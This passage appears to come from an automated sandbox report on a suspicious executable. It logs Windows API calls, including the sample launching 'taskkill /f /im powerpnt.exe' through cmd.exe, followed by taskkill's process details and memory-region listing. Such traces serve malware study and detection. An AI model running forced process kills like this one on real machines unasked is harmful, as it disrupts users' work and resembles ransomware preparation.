lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0216.368] SetErrorMode (uMode=0x8003) returned 0x1 [0216.368] GetProcessHeap () returned 0x650000 [0216.368] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6505c8, Size=0x56) returned 0x6505c8 [0216.369] GetProcessHeap () returned 0x650000 [0216.369] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x6505c8) returned 0x56 [0216.369] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0216.369] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.369] GetProcessHeap () returned 0x650000 [0216.369] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x110) returned 0x65af78 [0216.369] GetProcessHeap () returned 0x650000 [0216.369] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x218) returned 0x650628 [0216.375] GetProcessHeap () returned 0x650000 [0216.375] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x650628, Size=0x112) returned 0x650628 [0216.375] GetProcessHeap () returned 0x650000 [0216.375] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x650628) returned 0x112 [0216.375] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0216.375] GetProcessHeap () returned 0x650000 [0216.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xe0) returned 0x65b090 [0216.378] GetProcessHeap () returned 0x650000 [0216.378] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x65b090, Size=0x76) returned 0x65b090 [0216.378] GetProcessHeap () returned 0x650000 [0216.378] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x65b090) returned 0x76 [0216.378] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.378] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0216.379] GetLastError () returned 0x2 [0216.379] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.379] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x65b110 [0216.379] GetProcessHeap () returned 0x650000 [0216.379] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x657768 [0216.379] FindClose (in: hFindFile=0x65b110 | out: hFindFile=0x65b110) returned 1 [0216.379] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0216.380] GetLastError () returned 0x2 [0216.380] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x65b110 [0216.380] GetProcessHeap () returned 0x650000 [0216.380] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x657768, Size=0x4) returned 0x65b150 [0216.380] FindClose (in: hFindFile=0x65b110 | out: hFindFile=0x65b110) returned 1 [0216.380] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0216.380] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0216.380] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0216.386] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0216.386] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0216.386] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x158, hStdError=0x130)) [0216.386] GetProcessHeap () returned 0x650000 [0216.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x18) returned 0x6576c8 [0216.386] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0216.386] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0216.386] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0216.386] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0216.386] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0216.386] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0216.386] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0216.386] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0216.387] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0216.388] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0216.388] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0216.388] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0216.388] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0216.388] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0216.388] GetProcessHeap () returned 0x650000 [0216.388] RtlFreeHeap (HeapHandle=0x650000, Flags=0x0, BaseAddress=0x6576c8) returned 1 [0216.388] GetProcessHeap () returned 0x650000 [0216.388] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xa) returned 0x65b110 [0216.388] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.393] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im powerpnt.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im powerpnt.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im powerpnt.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x121c, dwThreadId=0x12e8)) returned 1 [0216.417] CloseHandle (hObject=0x98) returned 1 [0216.417] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.417] GetProcessHeap () returned 0x650000 [0216.417] RtlFreeHeap (HeapHandle=0x650000, Flags=0x0, BaseAddress=0x659d50) returned 1 [0216.418] GetEnvironmentStringsW () returned 0x659d50* [0216.418] GetProcessHeap () returned 0x650000 [0216.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xa76) returned 0x657cc0 [0216.418] FreeEnvironmentStringsA (penv="=") returned 1 [0216.418] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0217.757] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0217.758] CloseHandle (hObject=0x9c) returned 1 [0217.758] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0217.759] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0217.759] GetProcessHeap () returned 0x650000 [0217.760] RtlFreeHeap (HeapHandle=0x650000, Flags=0x0, BaseAddress=0x657cc0) returned 1 [0217.760] GetEnvironmentStringsW () returned 0x65b160* [0217.760] GetProcessHeap () returned 0x650000 [0217.760] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xa9c) returned 0x657cc0 [0217.760] FreeEnvironmentStringsA (penv="=") returned 1 [0217.760] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.760] GetProcessHeap () returned 0x650000 [0217.760] RtlFreeHeap (HeapHandle=0x650000, Flags=0x0, BaseAddress=0x657cc0) returned 1 [0217.761] GetEnvironmentStringsW () returned 0x65b160* [0217.761] GetProcessHeap () returned 0x650000 [0217.761] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xa9c) returned 0x657cc0 [0217.761] FreeEnvironmentStringsA (penv="=") returned 1 [0217.761] GetProcessHeap () returned 0x650000 [0217.761] RtlFreeHeap (HeapHandle=0x650000, Flags=0x0, BaseAddress=0x65b110) returned 1 [0217.761] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0217.761] _get_osfhandle (_FileHandle=1) returned 0x158 [0217.761] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0217.761] _get_osfhandle (_FileHandle=1) returned 0x158 [0217.761] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0217.761] _get_osfhandle (_FileHandle=0) returned 0x154 [0217.761] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0217.761] GetConsoleOutputCP () returned 0x1b5 [0217.762] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0217.762] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.763] exit (_Code=128) Thread: id = 361 os_tid = 0x9c4 Process: id = "70" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x2e7a7000" os_pid = "0x121c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "69" os_parent_pid = "0x2f0" cmd_line = "taskkill /f /im powerpnt.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5041 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5042 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5043 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5044 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 5045 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 5046 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 5047 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 5048 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 5049 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 5050 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 5051 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 5052 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5053 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5054 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5055 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5056 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5057 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5058 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5059 start_va = 0x4520000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 5060 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5061 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5062 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5063 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5064 start_va = 0x4530000 end_va = 0x476ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 5065 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5066 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5067 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5068 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5069 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5070 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5071 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5072 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5073 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 5074 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 5075 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5076 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5077 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5078 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5079 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5080 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5081 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5082 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5083 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5084 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5085 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5086 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5087 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5088 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5089 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5090 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5091 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5092 start_va = 0x4530000 end_va = 0x460ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 5093 start_va = 0x4670000 end_va = 0x476ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 5094 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5095 start_va = 0x4770000 end_va = 0x48f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004770000" filename = "" Region: id = 5096 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5097 start_va = 0x4900000 end_va = 0x4a80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004900000" filename = "" Region: id = 5098 start_va = 0x4a90000 end_va = 0x5e8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a90000" filename = "" Region: id = 5099 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5100 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 5101 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 5102 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 5103 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 5104 start_va = 0x5e90000 end_va = 0x61c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5105 start_va = 0x61d0000 end_va = 0x62b9fff monitored = 0 entry_point = 0x620d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5106 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 5107 start_va = 0x61d0000 end_va = 0x62affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5108 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5109 start_va = 0x44c0000 end_va = 0x44c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 5110 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5111 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 5112 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5113 start_va = 0x6cc30000 end_va 